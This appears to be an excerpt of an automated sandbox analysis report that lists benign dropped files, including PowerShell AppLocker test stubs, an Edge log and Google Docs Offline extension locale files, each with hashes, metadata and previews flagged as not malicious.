Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sozrkpnc.pnw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swweanrm.mgz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3dsubuo.j5g.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4ptzfss.hrq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2110
Entropy (8bit):	5.407553712667741
Encrypted:	false
SSDEEP:	48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrs:8e2Fa116uCntc5toYI8NM
MD5:	9E4C9068311DB2A5EEE34E914C656732
SHA1:	00F404DAE27C380C907BE8CCAA743AE736DCC7B4
SHA-256:	5C2EC1FDBEF8A3BD1470ADF10C6578099A9EE73310B2829C87F071AD2B47005D
SHA-512:	B08720523DAE6001FE3726241C6473284D1E09E6E3314FDBC755541A607925677105B1D336462CE2C53174A755D93204DBF4EE7C098333946B98D8934625B414
Malicious:	false
Preview:	{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

C:\Users\user\AppData\Local\Temp\fc2a4b79-cb5a-4500-8700-3d18872feddd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\2eeb18a7-3251-4c2c-9394-add962ce0e1f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	154477
Entropy (8bit):	7.835886983924039
Encrypted:	false
SSDEEP:	3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:	14937B985303ECCE4196154A24FC369A
SHA1:	ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:	71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:	1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...\|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.\|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,\|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
